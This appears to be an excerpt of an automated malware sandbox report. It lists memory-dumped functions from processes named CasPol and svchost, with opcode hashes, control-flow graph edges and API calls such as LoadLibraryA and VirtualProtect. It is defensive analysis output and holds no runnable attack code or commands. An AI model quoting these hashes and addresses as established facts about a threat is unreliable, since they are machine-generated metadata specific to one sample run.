                                                                                                                                                                                                                                                    • Instruction ID: cfbcdd8112a85a3263c9c628b5c00259953084cb3b0f6f05ea4db53a4a64c9bd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 852021de7c82a4d67aeca48ef6cfdd999773dd0de71d1d2b7b540fe12ed276f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52018131B211114FDB64EAADE85572FB7DADBCAB10F108439E50AC7385EE65DC028391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628ED90 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6a8aee6d8f045c8f105cd28b1ba62a83f0a33ac218c397faf39ce303284dcb69
                                                                                                                                                                                                                                                    • Instruction ID: c159931220f520bfe508bf4513deb37d064feeb25479bdbc5b2d5595e65a08bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a8aee6d8f045c8f105cd28b1ba62a83f0a33ac218c397faf39ce303284dcb69
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8201A431B210115FDB64A63C986472E7BDAE7CA720F118839F94AC7380DD25DC0387C5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0628A308 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c3025f95932b3e3baadb1635adc8b06ab205f7c1fa1cd1c7124ed75ff71c24e9
                                                                                                                                                                                                                                                    • Instruction ID: 2ec1273d1a6823cdd432bc33492247c9f5062cfd5b98c404db956abe547c462d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3025f95932b3e3baadb1635adc8b06ab205f7c1fa1cd1c7124ed75ff71c24e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D018171B202154FDB50AB3CE85476E77D5EB8A750F10882AF50AC7380DE25EC02C780
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06286468 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e22619fb3a85611381402247f4a9a250da6ba53818a60098639093def31c347d
                                                                                                                                                                                                                                                    • Instruction ID: edef7aa7b2fce68e537acc20c16116c12e97f20ead53cf30bfc9aa5feebd737d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e22619fb3a85611381402247f4a9a250da6ba53818a60098639093def31c347d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE0D871D2210D5FDF60EAA4DD4579E73ADE741204F6048A4DC04C7241F236DA02C380
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06284A59 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eb75e61d6f7ad72d45f6d35c8a4e241730efece513373acc55504099318ebb12
                                                                                                                                                                                                                                                    • Instruction ID: b7fdba706a9d26268b318fa03e544bb83e66833a7d8e960236ecfd5f1f0acab5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb75e61d6f7ad72d45f6d35c8a4e241730efece513373acc55504099318ebb12
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0DA31A2111ADFDB54EB94EC69BAD7BB2BF48701F20412AE402A7294CBB41D46CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06286478 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000001F.00000002.1648595290.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_6280000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a53f01c4160ff8c6aeb66e3f7dc727276e197e2469871abe3308ea846b2d2b12
                                                                                                                                                                                                                                                    • Instruction ID: 9f823607385d72ef35df77fe79b25b341d1394e4ba39ec287c9f1db8a062c625
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a53f01c4160ff8c6aeb66e3f7dc727276e197e2469871abe3308ea846b2d2b12
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95E0C270E32109AFDF60EEB0CD0975E73ADE741304F2088A4DC08C7281E272DA01C380
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:13.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:24
                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                    execution_graph 12501 7ff7c19a2e84 12502 7ff7c19a2e8d 12501->12502 12513 7ff7c19a2780 12502->12513 12504 7ff7c19a2ed3 12518 7ff7c19a0618 12504->12518 12507 7ff7c19a2780 LoadLibraryA 12508 7ff7c19a2f09 12507->12508 12509 7ff7c19a0618 LoadLibraryA 12508->12509 12510 7ff7c19a2f2b 12509->12510 12511 7ff7c19a2780 LoadLibraryA 12510->12511 12512 7ff7c19a2f38 12511->12512 12516 7ff7c19a279b 12513->12516 12514 7ff7c19a27ef 12514->12504 12515 7ff7c19a2930 LoadLibraryA 12517 7ff7c19a2984 12515->12517 12516->12504 12516->12514 12516->12515 12517->12504 12519 7ff7c19a3000 12518->12519 12520 7ff7c19a2780 LoadLibraryA 12519->12520 12521 7ff7c19a2efc 12520->12521 12521->12507 12522 7ff7c19a2d84 12523 7ff7c19a2d8d VirtualProtect 12522->12523 12525 7ff7c19a2e51 12523->12525 12526 7ff7c19a0a58 12527 7ff7c19a0a61 FreeConsole 12526->12527 12529 7ff7c19a0afe 12527->12529

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF7C1A80D71 Relevance: 1.2, Instructions: 1184COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1412 7ff7c1a80d71-7ff7c1a80e13 1417 7ff7c1a80e56-7ff7c1a80ecf 1412->1417 1418 7ff7c1a80e15-7ff7c1a80e26 1412->1418 1423 7ff7c1a81027-7ff7c1a81036 1417->1423 1424 7ff7c1a80ed5-7ff7c1a80ee8 1417->1424 1428 7ff7c1a81038-7ff7c1a81039 1423->1428 1424->1423 1425 7ff7c1a80eee-7ff7c1a80f1a 1424->1425 1425->1423 1427 7ff7c1a80f20-7ff7c1a80f33 1425->1427 1432 7ff7c1a80f35-7ff7c1a80f36 1427->1432 1433 7ff7c1a80fa4-7ff7c1a80fb6 1427->1433 1429 7ff7c1a8103c-7ff7c1a81058 1428->1429 1430 7ff7c1a8103b 1428->1430 1434 7ff7c1a8105b-7ff7c1a81069 1429->1434 1430->1429 1435 7ff7c1a80efc-7ff7c1a80f00 1432->1435 1436 7ff7c1a80f38-7ff7c1a80f3a 1432->1436 1433->1423 1438 7ff7c1a80fb8-7ff7c1a80fea 1433->1438 1437 7ff7c1a8106b-7ff7c1a81071 1434->1437 1442 7ff7c1a80f03-7ff7c1a80f1a 1435->1442 1443 7ff7c1a80f02 1435->1443 1444 7ff7c1a80f3c-7ff7c1a80f45 1436->1444 1445 7ff7c1a80f81 1436->1445 1440 7ff7c1a8107e-7ff7c1a81080 1437->1440 1441 7ff7c1a81073-7ff7c1a8107d 1437->1441 1438->1434 1456 7ff7c1a80fec-7ff7c1a80fef 1438->1456 1446 7ff7c1a81092-7ff7c1a81097 1440->1446 1447 7ff7c1a81082-7ff7c1a8108f 1440->1447 1441->1440 1442->1423 1442->1427 1443->1442 1450 7ff7c1a80f47-7ff7c1a80f65 1444->1450 1451 7ff7c1a80f66-7ff7c1a80f7e 1444->1451 1445->1423 1455 7ff7c1a80f87-7ff7c1a80fa2 1445->1455 1452 7ff7c1a810cc-7ff7c1a810e4 1446->1452 1453 7ff7c1a81099-7ff7c1a810b0 1446->1453 1447->1446 1450->1423 1463 7ff7c1a80f6b-7ff7c1a80f7e 1450->1463 1451->1445 1458 7ff7c1a810b2-7ff7c1a810ca 1453->1458 1459 7ff7c1a81121-7ff7c1a81157 1453->1459 1455->1433 1456->1437 1462 7ff7c1a80ff1 1456->1462 1458->1452 1468 7ff7c1a8118c-7ff7c1a811a4 1459->1468 1469 7ff7c1a81159-7ff7c1a81170 1459->1469 1462->1428 1466 7ff7c1a80ff3-7ff7c1a81026 1462->1466 1463->1445 1471 7ff7c1a81172-7ff7c1a8118a 1469->1471 1472 7ff7c1a811e1-7ff7c1a81230 1469->1472 1471->1468 1480 7ff7c1a81232-7ff7c1a81264 1472->1480 1481 7ff7c1a812a1-7ff7c1a812e9 1472->1481 1487 7ff7c1a812fd-7ff7c1a812fe 1481->1487 1488 7ff7c1a812eb-7ff7c1a812fb 1481->1488 1489 7ff7c1a81301-7ff7c1a81318 1487->1489 1488->1489 1493 7ff7c1a8134b-7ff7c1a813c9 1489->1493 1494 7ff7c1a8131a-7ff7c1a8131c 1489->1494 1500 7ff7c1a813cb-7ff7c1a813f9 1493->1500 1501 7ff7c1a81413-7ff7c1a81444 1493->1501 1494->1493 1495 7ff7c1a8131e-7ff7c1a81344 1494->1495 1495->1493 1503 7ff7c1a814a5-7ff7c1a814b5 1500->1503 1504 7ff7c1a813ff-7ff7c1a81412 1500->1504 1501->1503 1505 7ff7c1a81446-7ff7c1a81462 1501->1505 1509 7ff7c1a814b8-7ff7c1a81508 1503->1509 1510 7ff7c1a814b7 1503->1510 1504->1503 1506 7ff7c1a81418-7ff7c1a81444 1504->1506 1505->1503 1506->1503 1506->1505 1513 7ff7c1a8150a-7ff7c1a81517 1509->1513 1514 7ff7c1a8151f-7ff7c1a81530 1509->1514 1510->1509 1516 7ff7c1a8154c-7ff7c1a81564 1513->1516 1517 7ff7c1a81519-7ff7c1a8151d 1513->1517 1518 7ff7c1a81532-7ff7c1a8154a 1514->1518 1519 7ff7c1a815a1-7ff7c1a815ea 1514->1519 1517->1514 1518->1516 1526 7ff7c1a815ec-7ff7c1a815ee 1519->1526 1527 7ff7c1a8165b-7ff7c1a81668 1519->1527 1528 7ff7c1a8166a-7ff7c1a816f6 1526->1528 1529 7ff7c1a815f0-7ff7c1a81618 1526->1529 1527->1528 1542 7ff7c1a816f8-7ff7c1a81713 1528->1542 1543 7ff7c1a81766-7ff7c1a81790 1528->1543 1536 7ff7c1a8162c-7ff7c1a81639 1529->1536 1537 7ff7c1a8161a-7ff7c1a8162b 1529->1537 1537->1536 1555 7ff7c1a81727-7ff7c1a81731 1542->1555 1556 7ff7c1a81715-7ff7c1a81726 1542->1556 1546 7ff7c1a817a9 1543->1546 1547 7ff7c1a81792-7ff7c1a817a7 1543->1547 1549 7ff7c1a817ab-7ff7c1a817d9 1546->1549 1550 7ff7c1a817f3-7ff7c1a81824 1546->1550 1547->1546 1552 7ff7c1a81893-7ff7c1a818a5 1549->1552 1553 7ff7c1a817df-7ff7c1a817f2 1549->1553 1550->1552 1554 7ff7c1a81826-7ff7c1a81840 1550->1554 1562 7ff7c1a818a8-7ff7c1a818f0 1552->1562 1563 7ff7c1a818a7 1552->1563 1553->1550 1553->1552 1554->1552 1556->1555 1566 7ff7c1a8190a-7ff7c1a81920 1562->1566 1567 7ff7c1a818f2-7ff7c1a81907 1562->1567 1563->1562 1568 7ff7c1a81934-7ff7c1a8194f 1566->1568 1569 7ff7c1a81922-7ff7c1a81926 1566->1569 1567->1566 1570 7ff7c1a8192b-7ff7c1a81930 1569->1570 1570->1570 1571 7ff7c1a81932-7ff7c1a81933 1570->1571 1571->1568
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3cd0bd326f624f03dfdf1a776c1fdaaa56920b98d704525b4544f96c72ff8e72
                                                                                                                                                                                                                                                    • Instruction ID: 472cce6c23017d950e1f323858c94c26c18974f1e82081a2556908293efb47e0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cd0bd326f624f03dfdf1a776c1fdaaa56920b98d704525b4544f96c72ff8e72
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB82267190DBC58FE756EF2888556A8BFE0FF56314B4901FFC489CB493DA68A806C391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19A2780 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 265libraryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 1029625771-3993045852
                                                                                                                                                                                                                                                    • Opcode ID: 65a754a99105a1bd678e00567eccaf26018f439ddbe1bff99e68736da1e235f5
                                                                                                                                                                                                                                                    • Instruction ID: 3e2954f15fd35c9453cfef9530c3a4b33d54ba1d941e3700120946447dc72b9b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65a754a99105a1bd678e00567eccaf26018f439ddbe1bff99e68736da1e235f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7481D630508A8D8FEB58EF28D8457F57BD1FF59324F10417EE84DC7292DA74A8458B92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A8026B Relevance: 2.3, Strings: 1, Instructions: 1038COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 35 7ff7c1a8026b-7ff7c1a8026d 36 7ff7c1a8026e-7ff7c1a8027c 35->36 37 7ff7c1a803b1-7ff7c1a803b7 35->37 39 7ff7c1a80284-7ff7c1a80286 36->39 40 7ff7c1a803b9-7ff7c1a803c8 37->40 41 7ff7c1a80288-7ff7c1a80289 39->41 42 7ff7c1a802f7-7ff7c1a80306 39->42 44 7ff7c1a803c9-7ff7c1a80401 40->44 45 7ff7c1a8028b 41->45 46 7ff7c1a8024f-7ff7c1a8026a 41->46 43 7ff7c1a80307-7ff7c1a80309 42->43 43->37 47 7ff7c1a8030a-7ff7c1a80348 43->47 48 7ff7c1a8040e-7ff7c1a80427 44->48 49 7ff7c1a80403-7ff7c1a8040d 44->49 45->43 50 7ff7c1a8028d 45->50 46->35 47->40 74 7ff7c1a8034a-7ff7c1a8034d 47->74 54 7ff7c1a8045c-7ff7c1a80474 48->54 55 7ff7c1a80429-7ff7c1a80440 48->55 49->48 51 7ff7c1a802d4 50->51 52 7ff7c1a8028f-7ff7c1a802a0 50->52 51->37 58 7ff7c1a802da-7ff7c1a802f5 51->58 63 7ff7c1a80234-7ff7c1a8023b 52->63 64 7ff7c1a802a2-7ff7c1a802b8 52->64 61 7ff7c1a80442-7ff7c1a8045a 55->61 62 7ff7c1a804b1-7ff7c1a804d0 55->62 58->42 61->54 68 7ff7c1a804d1-7ff7c1a804d5 61->68 62->68 63->37 69 7ff7c1a80241-7ff7c1a8024e 63->69 64->37 67 7ff7c1a802be-7ff7c1a802d1 64->67 67->51 72 7ff7c1a804d7-7ff7c1a804e7 68->72 73 7ff7c1a804d6 68->73 69->46 75 7ff7c1a8051c-7ff7c1a80534 72->75 76 7ff7c1a804e9-7ff7c1a80500 72->76 73->72 74->44 77 7ff7c1a8034f 74->77 78 7ff7c1a80502-7ff7c1a8051a 76->78 79 7ff7c1a80571-7ff7c1a80590 76->79 81 7ff7c1a80396-7ff7c1a803b0 77->81 82 7ff7c1a80351-7ff7c1a8035f 77->82 78->75 88 7ff7c1a80597-7ff7c1a805a7 79->88 89 7ff7c1a80592-7ff7c1a80594 79->89 82->81 90 7ff7c1a805dc-7ff7c1a805f4 88->90 91 7ff7c1a805a9-7ff7c1a805c0 88->91 89->88 92 7ff7c1a805c2-7ff7c1a805da 91->92 93 7ff7c1a80631-7ff7c1a80668 91->93 92->90 98 7ff7c1a8069d-7ff7c1a806a8 93->98 99 7ff7c1a8066a-7ff7c1a8067a 93->99 105 7ff7c1a806bc-7ff7c1a806c5 98->105 106 7ff7c1a806aa-7ff7c1a806b9 98->106 100 7ff7c1a8067c-7ff7c1a8067e 99->100 101 7ff7c1a806eb-7ff7c1a806f8 99->101 103 7ff7c1a806fa-7ff7c1a8073c 100->103 104 7ff7c1a80680 100->104 101->103 111 7ff7c1a8073e-7ff7c1a80772 103->111 112 7ff7c1a80786-7ff7c1a8078b 103->112 108 7ff7c1a806c6-7ff7c1a806c7 104->108 110 7ff7c1a80682-7ff7c1a8069c 104->110 105->108 106->105 110->98 114 7ff7c1a80778-7ff7c1a80781 111->114 115 7ff7c1a80a42-7ff7c1a80a56 111->115 112->115 116 7ff7c1a8078c-7ff7c1a8079e 112->116 117 7ff7c1a80784-7ff7c1a80785 114->117 121 7ff7c1a80a57-7ff7c1a80a90 115->121 118 7ff7c1a8079f-7ff7c1a807bd 116->118 117->112 118->115 120 7ff7c1a807c3-7ff7c1a807d6 118->120 126 7ff7c1a807d8-7ff7c1a807d9 120->126 127 7ff7c1a80847-7ff7c1a80856 120->127 122 7ff7c1a80a9e-7ff7c1a80ab7 121->122 123 7ff7c1a80a93-7ff7c1a80a9d 121->123 128 7ff7c1a80aec-7ff7c1a80b04 122->128 129 7ff7c1a80ab9-7ff7c1a80ad0 122->129 123->122 126->118 130 7ff7c1a807db 126->130 131 7ff7c1a80857-7ff7c1a80859 127->131 133 7ff7c1a80b41-7ff7c1a80b77 128->133 132 7ff7c1a80ad2-7ff7c1a80aeb 129->132 129->133 130->131 134 7ff7c1a807dd 130->134 131->115 136 7ff7c1a8085a-7ff7c1a80872 131->136 132->128 141 7ff7c1a80bac-7ff7c1a80bc4 133->141 142 7ff7c1a80b79-7ff7c1a80b90 133->142 139 7ff7c1a80824 134->139 140 7ff7c1a807df-7ff7c1a807f0 134->140 151 7ff7c1a80874-7ff7c1a80877 136->151 152 7ff7c1a808e3-7ff7c1a808f0 136->152 139->115 145 7ff7c1a8082a-7ff7c1a80845 139->145 140->117 149 7ff7c1a807f2-7ff7c1a80808 140->149 147 7ff7c1a80b92-7ff7c1a80bab 142->147 148 7ff7c1a80c01-7ff7c1a80c37 142->148 145->127 147->141 159 7ff7c1a80c6c-7ff7c1a80c84 148->159 160 7ff7c1a80c39-7ff7c1a80c50 148->160 149->115 154 7ff7c1a8080e-7ff7c1a80821 149->154 156 7ff7c1a80879 151->156 157 7ff7c1a808f3 151->157 152->157 154->139 163 7ff7c1a8087b-7ff7c1a808a2 156->163 164 7ff7c1a808c0 156->164 157->115 162 7ff7c1a808f9-7ff7c1a8090c 157->162 166 7ff7c1a80c52-7ff7c1a80c6a 160->166 167 7ff7c1a80cc1-7ff7c1a80cfe 160->167 177 7ff7c1a8090e-7ff7c1a80912 162->177 178 7ff7c1a8097d-7ff7c1a80990 162->178 163->115 171 7ff7c1a808a8-7ff7c1a808be 163->171 168 7ff7c1a808c3-7ff7c1a808e1 164->168 169 7ff7c1a808c2 164->169 166->159 168->152 169->168 171->115 171->164 179 7ff7c1a80914 177->179 180 7ff7c1a80993 177->180 178->180 183 7ff7c1a80974-7ff7c1a8097a 179->183 180->115 181 7ff7c1a80999-7ff7c1a809b5 180->181 186 7ff7c1a809b7-7ff7c1a809cc 181->186 187 7ff7c1a809d2-7ff7c1a809e6 181->187 183->178 186->187 187->121 188 7ff7c1a809e8-7ff7c1a809ed 187->188 188->183 190 7ff7c1a809ef 188->190 190->115
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: 198fd46360dd4673e13dca9be8104204ef3640ec805e10a2ee29f0189aa05fe8
                                                                                                                                                                                                                                                    • Instruction ID: 809826535ac4be12e326f981bd4ab1e042a6b8843051da4b4699bb3b64d63275
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 198fd46360dd4673e13dca9be8104204ef3640ec805e10a2ee29f0189aa05fe8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66626C7180DB858FE756EF288855AA8FFE0FF56310F5405FBC089CB593DA64A806C7A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19A2D84 Relevance: 1.6, APIs: 1, Instructions: 127memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1114 7ff7c19a2d84-7ff7c19a2d8b 1115 7ff7c19a2d96-7ff7c19a2e4f VirtualProtect 1114->1115 1116 7ff7c19a2d8d-7ff7c19a2d95 1114->1116 1119 7ff7c19a2e51 1115->1119 1120 7ff7c19a2e57-7ff7c19a2e7f 1115->1120 1116->1115 1119->1120
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 059aa15f8562d2a419072f7308eea90f897467239296b2c71ef3632d6420ea55
                                                                                                                                                                                                                                                    • Instruction ID: 49fd32fb50de9a8121bf60990effe51e6d0eacbf00afa8af091bfcbd75b1a63c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059aa15f8562d2a419072f7308eea90f897467239296b2c71ef3632d6420ea55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A31C53090CA488FDB18EFA898466F9BBE1FB56321F14426FD049C3292DF646856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19A0A58 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1121 7ff7c19a0a58-7ff7c19a0a5f 1122 7ff7c19a0a61-7ff7c19a0a69 1121->1122 1123 7ff7c19a0a6a-7ff7c19a0afc FreeConsole 1121->1123 1122->1123 1126 7ff7c19a0b04-7ff7c19a0b2b 1123->1126 1127 7ff7c19a0afe 1123->1127 1127->1126
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1518240842.00007FF7C19A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19A0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c19a0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 771614528-0
                                                                                                                                                                                                                                                    • Opcode ID: 86525104b4e44cf35dc287c44005da11f9017dc464887b92e6acab49b39fba75
                                                                                                                                                                                                                                                    • Instruction ID: 35a56f22a3d13e6cbd7826cf2ce05a34b2e35d07cc212588d13aa30dc5954f40
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86525104b4e44cf35dc287c44005da11f9017dc464887b92e6acab49b39fba75
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E031A57090CB488FDB19DFA8D8497EABBF0EF56321F04426FD089C3192DA74A459CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C1A81269 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000026.00000002.1519285861.00007FF7C1A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A80000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_38_2_7ff7c1a80000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
